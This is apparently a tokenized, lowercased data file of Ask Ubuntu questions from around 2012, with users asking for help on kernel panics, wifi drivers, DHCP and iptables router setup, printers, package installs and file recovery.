221328	how to diagnose and fix kernel panic fatal machine check error ?	i have got a new samsung series 7 laptop with dual boot setup for windows 8 and ubuntu 12.10 . a fine machine comparable to a macbook pro . the ubuntu installation was quite a hassle , but with the help of boot repair finally it seemed to work . or so i thought . windows 8 starts fine , but if i want to start ubuntu regularly the following machine check exception error occurs , quite similar to this one [ hardware error ] cpu 1 : machine check exception : 5 bank 6 [ hardware error ] rip ! inexact ! 33 < 00007fab2074598a > [ hardware error ] tsc 95b623464c addr fe400 misc 3880000086 .. [ similar messages for cpu 2,3 and 0 ] .. [ hardware error ] machine check : processor context corrupt kernel panic - not syncing : fatal machine check rebooting in 30 seconds kernel panic does not sound good . then it starts to reboot , and the second boot trial often works . is it a kernel or driver problem ? the laptop has an intel core i7 processor . i already deactivated hyperthreading in the bios , but it does not seem to help : - ( i also disabled the execute disable bit ( edb ) flag in the bios . edb is an intel hardware-based security feature that can help reduce system exposure to viruses and malicious code . since i disabled it , the error did occur less frequently , but it still appears occasionally : - ( it seems to be the same error as described here and here . maybe a samsung specific kernel problem ? a similar error also happens on a samsung ultrabook series 9 ( which seems to be kernel bugs 49161 and 47121 ) . at my samsung series 7 , it still occurs for instance during booting on battery after `` checking battery state '' . perhaps anyone else has an idea ? these kernel panic errors are reallly annoying..
221329	how do i configure dhcpd ?	i have installed two virtual machines that are running ubuntu ( i am using vmware 9.0 ) . i installed the dhcp server package on the first machine ( `` ubuntu a '' ) , and i want the second virtual machine ( `` ubuntu b '' ) to be the client , receiving dhcp addresses from `` ubuntu a '' . but i do not know how to configure dhcpd on `` ubuntu a '' . can you guide me how to configure it ? i 'm using ubuntu 12.04 lts . thank you .
221331	where to get aegisub ?	where can i get new aegisub ? ubuntu reps have only 2.1.9 which is very buggy ( it does n't support cyrillic lower case , it 's unaceptable for me ) . i found only source , but i 'm not sure , that i can do everything right . where to get new package ( at least newer ) ?
221335	the fan on my laptop runs constantly in ubuntu	maybe someone asked this already , but i must ask why my cooler constantly blowing when i start ubuntu ? when i 'm on windows 7 its normal , cooler blowing just when i play some game . here is my laptop configuration : amd速 fusion apu quad core a8-3500m 1.5 ghz , graphic card amd radeon hd 6520g 1gb ram 8gb ddr3 hdd 500 gb
221338	is there any music studio programme on ubuntu ?	i have a lots of music composition and i want to make my songs dvd.is there any programme recommended to use ? i hate windows and mac.but they are rich of theese programmes.clearly i look for home studio programme that include piano sound and guitar sound.and when i play piano on keyboard it must save my composition.maybe it contain extra rythyms as blues , polka , and some chords..thank you for your attentiton ...
221340	mouse flickering/disappearing	when i move my mouse around in ubuntu 12.10 it flickers . when it 's not moving it disappears . any ideas ? info macbook pro 7.1 nvidia 320m ubuntu 12.10
221344	any known ubuntu issues on acer aspire s3-391 ?	i 'm in the market for a new laptop to run ubuntu 12.10 on -- i have my eye on a very reasonably priced acer aspire s3-391 with a i7 chip and a hybrid drive . does anyone have a s3 and does it work okay ... any known issues ? i currently run ubuntu 12.04 on a acer aspire one , which has constant suspend issues , so i am a little wary to go with the same manufacturer .
221346	how to re-install grub boot loader in windows ?	i just install windows 8 without effecting ubuntu . but it directly boot into windows 8 . how can i re-install grub boot loader ?
221347	12.10 login error `` unable to mount floppy disk ''	after a fresh install of 12.10 on a system with 6 users . every user that logs in gets the message error mounting system-managed device /dev/fd0 : command-line `mount `` /media/floppy0 '' ' exited with non-zero exit status 32 : mount : /dev/fd0 is not a valid block device no on wants to mount a floppy and the drive is empty . this happens on every single login .
221348	dell sputnik to launch in the uk ?	does anyone know if dell is to release the dell xps 13 laptop , developer edition , running ubuntu 12.04lts – code named project sputnik – in the united kingdom ? if so , does anyone know when ?
221351	lightdm not working at all since bumblebee install !	i 'm relatively new to ubuntu , so please excuse me if my question is stupid ... so a few weeks ago , i bought a gigabyte u2442n with optimus graphics ( a 640m and a hd4000 ) . i installed the stable release of quantal relatively new at the time , and then , after some research , found out that i needed to install bumblebee for optimus to work . but after installation , ubuntu was hanging on boot ( just a black screen with a flashing prompt ) . i figured it must be the display manager , so after some time , i gave up and just installed gdm , which works just fine . but still , i like lightdm with the unity greeter much better , so i tried everything to get lightdm to work : i used different nvidia ppas and tried solutions suggested to similar problems , but nothing helped . is this maybe a known bug ? or did i just do something wrong ? i appreciate any help ...
221354	why was whoopsie not disabled in stable 12.10 ?	i was wondering about this for quite a while . i 've been using ubuntu for quite a long time now , and i knew apport showed these `` internal error detected '' messages , without actually being noticably affected by something , but this was always in alpha/beta/rc versions of ubuntu . as far as i know , apport was always disabled when the distro hits release . why did this not happen for ubuntu 12.10 ? is this a bug , or is this planned ? nonetheless , it gives a messy impression imo edit : apparantly , this was also the case for ubuntu 12.04 , and it 's not apport , but whoopsie .
221355	my mouse is too fast on 12.04	i just installed 12.04 but the mouse is far too fast and it is almost impossible to do a double click . i have checked the mouse speed settings with no success .
221363	installing along side of windows 8	it appears as though many people are having problems installing ubuntu along side windows 8 . my problem , however , seems to be sufficiently different to be unique among such problems . i ca n't get the ubuntu 12.10 live-usb installer to run . when i boot i get the following four options : run from this usb install to disk check memory ( i ca n't remember the last one ) i have tried the top two . both result in the screen going black briefly then windows 8 booting as per usual . does anyone know how i may manage to overcome this problem ?
221369	wifi installation issues with a sitecom 300n x2 wireless network dongle	linux newbie here , anyway so here is the problem , i run ubuntu 10.10 and i have a sitecom 300n x2 wireless network dongle with chipset 8192su , i used ndiswrapper to install my windows wireless driver because sitecom does n't have a linux driver , it says hardware present but it does n't find any wireless networks , nor does it connect to one . what can i do ? the command `` dmesg | grep ndis '' gave this output in the terminal : [ 9.999954 ] ndiswrapper version 1.56 loaded ( smp=yes , preempt=no ) [ 11.111901 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisallocatenetbufferandnetbufferlist' [ 11.111973 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismindicatereceivenetbufferlists' [ 11.112099 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismregisterminiportdriver' [ 11.112161 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisallocatemdl' [ 11.112220 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismderegisterminiportdriver' [ 11.112280 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisfreenetbufferlistpool' [ 11.112339 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisallocatenetbufferlistpool' [ 11.112399 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisfreemdl' [ 11.112457 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismallocateport' [ 11.112515 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismnetpnpevent' [ 11.112573 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismfreeport' [ 11.112631 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismsendnetbufferlistscomplete' [ 11.112780 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismsetminiportattributes' [ 11.112848 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisopenconfigurationex' [ 11.112946 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismindicatestatusex' [ 11.113017 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndismoidrequestcomplete' [ 11.113112 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisallocatememorywithtagpriority' [ 11.113200 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisallocateioworkitem' [ 11.113271 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisfreeioworkitem' [ 11.113342 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisqueueioworkitem' [ 11.113413 ] ndiswrapper ( import:233 ) : unknown symbol : ndis.sys : 'ndisfreenetbufferlist' [ 11.113481 ] ndiswrapper ( import:233 ) : unknown symbol : wdfldr.sys : 'wdfversionbind' [ 11.113547 ] ndiswrapper ( import:233 ) : unknown symbol : wdfldr.sys : 'wdfversionbindclass' [ 11.113613 ] ndiswrapper ( import:233 ) : unknown symbol : wdfldr.sys : 'wdfversionunbindclass' [ 11.113680 ] ndiswrapper ( import:233 ) : unknown symbol : wdfldr.sys : 'wdfversionunbind' [ 11.113742 ] ndiswrapper ( load_sys_files:206 ) : could n't prepare driver 'net8192su' [ 11.148888 ] ndiswrapper ( load_wrap_driver:108 ) : could n't load driver net8192su ; check system log for messages from 'loadndisdriver' [ 11.365200 ] usbcore : registered new interface driver ndiswrapper [ 12.818573 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy [ 12.819183 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy [ 12.819796 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy [ 12.820505 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy [ 12.821115 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy [ 12.821726 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy [ 12.822339 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy [ 12.822948 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy [ 12.823560 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy [ 12.824204 ] modules linked in : snd_wavefront snd_emu10k1 ( + ) snd_cs4236 snd_usb_audio snd_wss_lib snd_opl3_lib snd_ac97_codec ac97_bus nouveau ( + ) snd_pcm i915 snd_usbmidi_lib snd_util_mem snd_page_alloc snd_hwdep snd_mpu401 snd_mpu401_uart snd_seq_midi snd_rawmidi ttm snd_seq_midi_event drm_kms_helper snd_seq ppdev snd_timer snd_seq_device drm ndiswrapper snd parport_pc emu10k1_gp intel_agp ns558 gameport soundcore i2c_algo_bit shpchp lp video output agpgart parport usbhid hid 8139too 8139cp mii floppy
221377	step by step installation of nagios	i 'm a novice linux user and i 'm looking for a step by step guide on how to install nagios to monitor our network usage ( bandwidth and all ) . i 've tried installing it a couple of times , but it seems it conflicts with koha 3.8 , which i also have installed . i 'm running ubuntu 12.04 lts desktop edition , x86 . any help would be greatly appreciated . regards
221378	how do i throttle a command in a terminal window ?	i needed to run convert with a lot of images at the same time . the command took quite a while but this does n't bother me . the issue is that this command rendered my computer unusable while the command was running ( for about 15 minutes ) . so is it possible to throttle the command by limiting resources ( processor and memory ) to the command , directly from the command line ? this can only work if i add something to the same line before pressing enter because once i start the process the computer slows so much that it is impossible for example to switch to `` system monitor '' and reduce priority . edit : top and iotop results i managed to run top and sudo iotop > iotop.txt while doing one of these convert operations . ( the iotop.txt file produced is difficult to read ) results of top : pid user pr ni virt res shr s % cpu % mem time+ command 14275 username 20 0 4043m 3.0g 1448 d 7.0 80.4 0:16.45 convert results of iotop : [ ? 1049h [ 1 ; 24r ( b [ m [ 4l [ ? 7h [ ? 1h= [ 39 ; 49m [ ? 25l [ 39 ; 49m ( b [ m [ h [ 2jtotal disk read : 1269.04 k/s | total disk write : [ 59g0.00 b/s ( b [ 0 ; 7m tid prio user disk read disk write swapin ( b [ 0 ; 1 ; 7m io > ( b [ 0 ; 7m command [ 3 ; 2h ( b [ m2516 be/4 username 350.08 k/s 0.00 b/s 0.00 % 0.00 % zeitgeist-datahub 7394 be/4 username 568.88 k/s 0.00 b/s 77.41 % 0.00 % -- rendere~.530483991 [ 5 ; 1h14275 idle username 350.08 k/s 0.00 b/s 37.49 % 0.00 % convert s~f test.pdf [ 6 ; 2h2048 be/4 root [ 6 ; 24h0.00 b/s 0.00 b/s 0.00 % 0.00 % [ kworker/3:2 ] [ 5g1 be/4 root [ 7 ; 24h0.00 b/s 0.00 b/s 0.00 % 0.00 % init furthermore , even after the process ends , the computer does not return to the previous performance . i found a way around this by running sudo swapoff -a followed by sudo swapon -a
221384	how do i install a lexmark pro200 printer driver for ubuntu 12.10 ?	how do i install a lexmark pro200 printer driver for ubuntu 12.10 ? my printer only has a wireless network interface .
221385	how to find which `` package can be updated '' ?	i have installed ubuntu 12.04 on amazon ec2 . sometimes after connecting with the instance i get the following how can i find which packages can be updated ? can i choose if do n't wish to update some packages ?
221386	can not install crossover	i ca n't install crossover from the package , `` .deb '' . here is a screenshoot of it : here is what i got when i was trying to install with terminal : `young @ jianyue : ~ $ cd /home/young/desktop young @ jianyue : ~/desktop $ sudo dpkg -i crossover.deb selecting previously unselected package ia32-crossover . ( reading database ... 127804 files and directories currently installed . ) unpacking ia32-crossover ( from crossover.deb ) ... dpkg : dependency problems prevent configuration of ia32-crossover : ia32-crossover depends on libc6-i386 ; however : package libc6-i386 is not installed . ia32-crossover depends on ia32-libs | ia32-apt-get ; however : package ia32-libs is not installed . package ia32-apt-get is not installed . ia32-crossover depends on lib32gcc1 ; however : package lib32gcc1 is not installed . ia32-crossover depends on lib32nss-mdns ; however : package lib32nss-mdns is not installed . ia32-crossover depends on lib32z1 ; however : package lib32z1 is not installed . ia32-crossover depends on python-glade2 ; however : package python-glade2 is not installed . ia32-crossover depends on lib32asound2 ; however : package lib32asound2 is not installed . dpkg : error processing ia32-crossover ( -- install ) : dependency problems - leaving unconfigured processing triggers for doc-base ... processing 33 changed doc-base files , 1 added doc-base file ... errors were encountered while processing : ia32-crossover `
221389	do i have to do a new installation ?	i was in the /etc/sudoers and might done something wrong , beacuse after i couldnâ´t use the commandline again . maybe i deleted sudo in /etc/sudoers . it said something was wrong i line 28 . what can i do to restore this or do i have to install ubuntu again ? ?
221391	toshiba c850 wireless driver not installing in 12.10	i was using 12.04 and wireless card installed well working too . but when i upgraded to 12.10 wireless driver not working . http : //ubuntuforums.org/showthread.php ? t=2040656 i tried the above one but it 's not working for me ? anybody help me on this please . thanks
221393	packettracer problem	a few days back i installed .bin packet tracer using terminal . it got installed successfully and is opening too from the desktop icon . problem is when i save a .pkt file that file does n't open . anyone pl . help
221394	how do i install the x.org radeon/ati driver ?	i recently downloaded version 7 of the radeon/ati x.org driver from this link : http : //cgit.freedesktop.org/xorg/driver/xf86-video-ati my question is how do i compile and install it ? i do n't like using the offical amd/ati driver . ubuntu version is 12.10
221396	how to load python3 to eric ide ?	installed eric ide for python 3 learning by using ubuntu 12.04 lts . but eric showing python2.7.3 , not showing python 3 even its installed . so how can i configure eric to show the python as python3 .
221401	hd video peformance unacceptable	was wondering if anyone could help me boost hd 1080p video performance on my machine ? i 've got an amd athlon x2 dual core processor , 2 gb ram & an ati radeon 5450 video card . i 've installed the latest ati catalyst drivers , i installed the hardware acceleration things and linked them ( i believe ) to vlc . still , it 's still not running as well as i would like . any thoughts or suggestions ? any help would be much appreciated . thanks !
221402	unable to access internet in 12.10 ubuntu	i have installed ubuntu 12.10 yesterday . internet worked fine after connecting wireless wifi in my university . but , i could not access internet at home after connecting to home wireless wifi . pls note , i am getting message that connection is established , but could not access the internet . can any one please help me with this .
221403	ubuntu server file permissions auto-change	hello im having a problem with a project of mine , i have ubuntu server 12.04.1 lts , the problem i 'm having is that i everytime i upload a file through ftp i need to modify file permissions otherwise it isnt available through browser.how can i modify the /var/www folder permissions to be seen by public through web browser and every new file/directory have the permissions of the www directory ?
221404	printing to a printer connected to a wireless router	i have a netgear wndr4500 wireless router which allows me to print wirelessly to a printer connected to it via a usb cable . however , the software used to print to it only works for windows and os x. i 've connected a brother hl-5150d to it . the printer works normally when i connect it directly to the computer , but i do n't know how to set it up in ubuntu when i connect it to the wireless router . i can also connect and print to the printer on a windows computer using the software provided with the router . i think the software for windows uses tcp to create a virtual usb bus and the printer is accessed using the same printer installation as when it is plugged directly into the computer . i do n't know what protocol the router uses . i 've seen the question printing to a printer attached to a network usb hub , but i 'm not sure if my router uses the same protocol . i tried the instructions the answer gave using my router 's ip address , but when i try to print a test page it says copying data then says printer is in use . in the printer queue window it says not connected . i 've also tried typing my router 's ip address into the `` find network printer '' section of the add printer dialog , but nothing comes up in the search . how can i access a printer connected to the router using ubuntu ? thanks .
221411	ubuntu 12.04 unstable display , flickering	i use ubuntu 12.04 . the text character on my screen while on the internet s too small , so i decided to adjust the display to give larger characters . this caused the screen to become very unstable , once i am logged it the screen begins to flicker . i am now using the guest login . how can i read just the display to first make it stable and secondly to have larger text characters ? thanks in anticipation , elton .
221413	installing burg on 12.10	a while back i was dual booting win 7 and 12.04 and had burg running just fine . a couple months later i messed up my 12.04 partition and decided the easiest way to fix the problem would be to install 12.10 . i did that and now i can not seem to find a way to get burg reinstalled . my question is has anyone done it successfully ? if so , could you please help me get that set up ?
221416	how to install adobe reader .bin download from adobe	i am having ubuntu operating system . i have downloaded file adberdr9.5.1-1_i486linux_enu.bin file from adobe . it is located in my downloads directory . i am a new user of linux . please could you provide step by step instructions & commands to install adobe reader .
221420	compiz/unity does n't start at login	out of a sudden after i logging in to the 'ubuntu ' session unity or maybe compiz does n't start anymore ( actually i 'm not sure wether it is compiz or unity ) . i can start unity manually with setsid unity & and put the command as a startup script but that 's not how it should be . i also tried a lot of `` solutions '' but none of them helped : checked for activated 'unity ' module in ccsm reinstalled lightdm reset compiz and unity reinstalled all compiz/unity packages many more ... the question now is , how do i get compiz/unity to be started propperly at login again ? i 'm on 12.10 with intel graphics .
221422	request tracker 4.x on ubuntu 12.04	i have a ubuntu 12.04 server installed on my machine . i am trying to install request-tracker4 . here 's what i have done so far : installed request-tracker via `` sudo apt-get install request-tracker4 '' i then tried configuring rt_siteconfig.pm in /etc/request-tracker4 but then ran into problems in populating the mysql database . i then did sudo dpkg-reconfigure request-tracker4 it solved my problems of not being able to populate / setup mysql etc . now , i am trying to setup rt under www.mydomain.com/rt i have read various how-to 's and bestpractical 's own guides but i am not very much a expert in apache configurations so stuck . my current ubuntu 12.04 server setup : apache2 , fastcgi installed ( checked in /etc/apache2/mods-enabled web server document root is default /var/www/ web user www-data question is : where and what shall i put in apache configuration to start using rt via the web-interface ? i have seen two files in /etc/request-tracker4/ apache2-fastcgi.conf and apache2-fcgid.conf i even tried making a ln -s apache2-fastcgi.conf /etc/apache2/conf.d but when i tried opening that file in root while in the conf.d directory it said too many levels . any request tracker experts on ubuntu ? : - ) your help will be very useful and appreciated . thanks please let me know if you need further info !
221425	how can i integrate nightingale with the unity sound menu ?	i have tried going to dconf-editor and adding it to the preferred and interested media playered list . while it does show up in the sound meni the pause , next track and previous track have no effect .
221433	downloaded the ubuntu iso from torrent and normal download , but they 're not the same size	there two version of ubuntu 12.10 the normal download in browser and the the one from torrent and and the torrent download file size in total is ( 800 mb ) and and normal download is ( 763 mb ) which should i get because i know you are updating the iso sometimes so which one is the updated one ? thank you : )
221435	postgres gem wo n't install on 12.10	i am trying to get ruby on rails working on my computer but the pg gem keeps failing . i have found a lot of other questions saying that you just need to use the libpq-dev package from apt and that should fix it but it is still saying that it ca n't find the library . nicholas @ nick-ubuntu : ~ $ gem instal pg -- -- with-pq-lib=/usr/lib building native extensions . this could take a while ... error : error installing pg : error : failed to build gem native extension . /home/nicholas/.rvm/rubies/ruby-1.9.3-p327/bin/ruby extconf.rb -- with-pq-lib=/usr/lib checking for pg_config ... yes using config values from /usr/bin/pg_config checking for libpq-fe.h ... yes checking for libpq/libpq-fs.h ... yes checking for pg_config_manual.h ... yes checking for pqconnectdb ( ) in -lpq ... no checking for pqconnectdb ( ) in -llibpq ... no checking for pqconnectdb ( ) in -lms/libpq ... no ca n't find the postgresql client library ( libpq ) *** extconf.rb failed *** could not create makefile due to some reason , probably lack of necessary libraries and/or headers . check the mkmf.log file for more details . you may need configuration options . provided configuration options : -- with-opt-dir -- with-opt-include -- without-opt-include= $ { opt-dir } /include -- with-opt-lib -- without-opt-lib= $ { opt-dir } /lib -- with-make-prog -- without-make-prog -- srcdir= . -- curdir -- ruby=/home/nicholas/.rvm/rubies/ruby-1.9.3-p327/bin/ruby -- with-pg -- without-pg -- with-pg-dir -- without-pg-dir -- with-pg-include -- without-pg-include= $ { pg-dir } /include -- with-pg-lib -- without-pg-lib= $ { pg-dir } /lib -- with-pg-config -- without-pg-config -- with-pg_config -- without-pg_config -- with-pqlib -- without-pqlib -- with-libpqlib -- without-libpqlib -- with-ms/libpqlib -- without-ms/libpqlib gem files will remain installed in /home/nicholas/.rvm/gems/ruby-1.9.3-p327/gems/pg-0.14.1 for inspection . results logged to /home/nicholas/.rvm/gems/ruby-1.9.3-p327/gems/pg-0.14.1/ext/gem_make.out
221438	setting up ubuntu server as a router with dhcpd and 3 ethernet devices	my configuration : ubuntu 12.04 dhcp3-server bind9 eth0 , eth1 , eth2 eth0 is the external connection eth1 & eth2 are the internal network eth1 and eth2 are supposed to be seperate networks of student/teachers respectivly . what i would like to have is the internet from external device bridged to device 1 and 2 , with the dhcp server controlling the two internal devices . its already working with dhcp , the part i am stuck on is bridging for internet . i have setup a script that i found here : router with the original script he linked here : ubuntu router guide removed the old configs , not sure they were still accurate if you need more information please just let me know . edit : so i had a 255.255.254.0 network , i believe that was causing the issue . not sure if it will matter on the second card , i will test later . after changing the subnet to 255.255.255.0 the pings will pass through , however , i can not get dns requests to pass ? my new config for firewall rules updated # generated by iptables-save v1.4.12 on thu dec 6 20:15:11 2012 *nat : input accept [ 0:0 ] : prerouting accept [ 0:0 ] : output accept [ 0:0 ] : postrouting accept [ 0:0 ] -a postrouting -o eth0 -j masquerade -a postrouting -o eth0 -j snat -- to-source 192.168.11.1-192.168.11.254 -a postrouting -o eth0 -j snat -- to-source 192.168.25.1-192.168.25.254 commit # completed on thu dec 6 20:15:11 2012 # generated by iptables-save v1.4.12 on thu dec 6 20:15:11 2012 *mangle : prerouting accept [ 9:1591 ] : input accept [ 9:1591 ] : forward accept [ 0:0 ] : output accept [ 6:3498 ] : postrouting accept [ 6:3498 ] commit # completed on thu dec 6 20:15:11 2012 # generated by iptables-save v1.4.12 on thu dec 6 20:15:11 2012 *filter : forward accept [ 0:0 ] : input accept [ 0:0 ] : output accept [ 0:0 ] # wan to lan -a forward -m state -i eth0 -o eth1 -- state established , related -j accept # wan to lan -a forward -m state -i eth0 -o eth2 -- state established , related -j accept # lan to wan -a forward -m state -i eth1 -o eth0 -- state new , established , related -j accept # lan to wan -a forward -m state -i eth2 -o eth0 -- state new , established , related -j accept # log -a forward -j log commit # completed on thu dec 6 20:15:11 2012 not sure what else you may need , but i am using webmin to control the server ( needed for the operators on site to know how to use it . ) if you could explain it as standard cli commands , or edits to this file directly then we should be ok. : ) and thanks again erik , i do believe your edits did help . most recent edits root @ lfbc-us01 : ~ # ip route default via 192.168.1.1 dev eth0 metric 100 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.25 192.168.11.0/24 dev eth1 proto kernel scope link src 192.168.11.1 192.168.25.0/24 dev eth2 proto kernel scope link src 192.168.25.1 root @ lfbc-us01 : ~ # according to my understanding this represents the routes in my server , for some reason the dns will not pass through , and pings to google on my windows 7 machine do not pass through . any suggestions ? my interfaces settings auto lo eth0 eth1 eth2 iface lo inet loopback iface eth0 inet dhcp dns-nameservers 208.67.222.123 208.67.220.123 8.8.8.8 8.8.4.4 iface eth1 inet static address 192.168.11.1 netmask 255.255.255.0 broadcast 192.168.11.255 network 192.168.11.0 iface eth2 inet static address 192.168.25.1 netmask 255.255.255.0 broadcast 192.168.25.255 network 192.168.25.0 and finally my dhcp.conf ddns-update-style none ; default-lease-time 7000 ; max-lease-time 7200 ; log-facility local7 ; # student network subnet 192.168.11.0 netmask 255.255.255.0 { option domain-name-servers 192.168.11.1 ; range 192.168.11.2 192.168.11.252 ; option routers 192.168.11.1 ; option broadcast-address 192.168.11.255 ; } # teacher network subnet 192.168.25.0 netmask 255.255.255.0 { option domain-name-servers 192.168.25.1 ; range 192.168.25.2 192.168.25.252 ; option routers 192.168.25.1 ; option broadcast-address 192.168.25.255 ; }
221441	usb filesystem not `` safely remove '' d - file , folder recovery	my spouse 's usb thumb-drive ( winxp filesystem , pretty sure ... ) was not `` safely remove '' d from my daughter 's macbook . now ( many ) files and ( all ) sub-folders on it are corrupted ( ... yeah , i know ... ) . is it possible to recover [ some | most | all ] of these files and folders ? i 've been trying to help her by mounting the thumb-drive on my ubuntu 12.10 laptop . the thumb-drive mounts under ubuntu ( 12.10 ) , and does list files at the top level ( have not tried to access those top-level files , though ) , but indicates that it `` ca n't access /media/robert/ca71-f795/'folder-name ' : input/output error '' for every folder at that level ( ..face-palm ... ) . not a noob , so though i strenuously try to avoid making this kinda mistake myself , i am unfamiliar with recovery practices/procedures as a result . can anything be done to recover these files and folders ? what would you do ? thanks for any/all [ help | advice | suggestions ] .
221446	what is the difference between charms for oneiric and precise ?	i do not understand the difference between an oneiric charm and a precise charm . but i know that it is something important . can anybody explain this for me ?
221457	how can i download a video that are in screencast.com ?	what chrome or firefox plugin can help me to download a video published at screencast.com . pls , if you know another method to grab the video and the sound , let me know too ; )
221458	can not open password-protected ppt with libre office 3.5	when i am trying to open password-protected ppt with libre office 3.5 in ubuntu 12.04 , it gives me a message says `` read-error . loading of password-encrypted microsoft powerpoint is not supported . `` so is there any solution to this ?
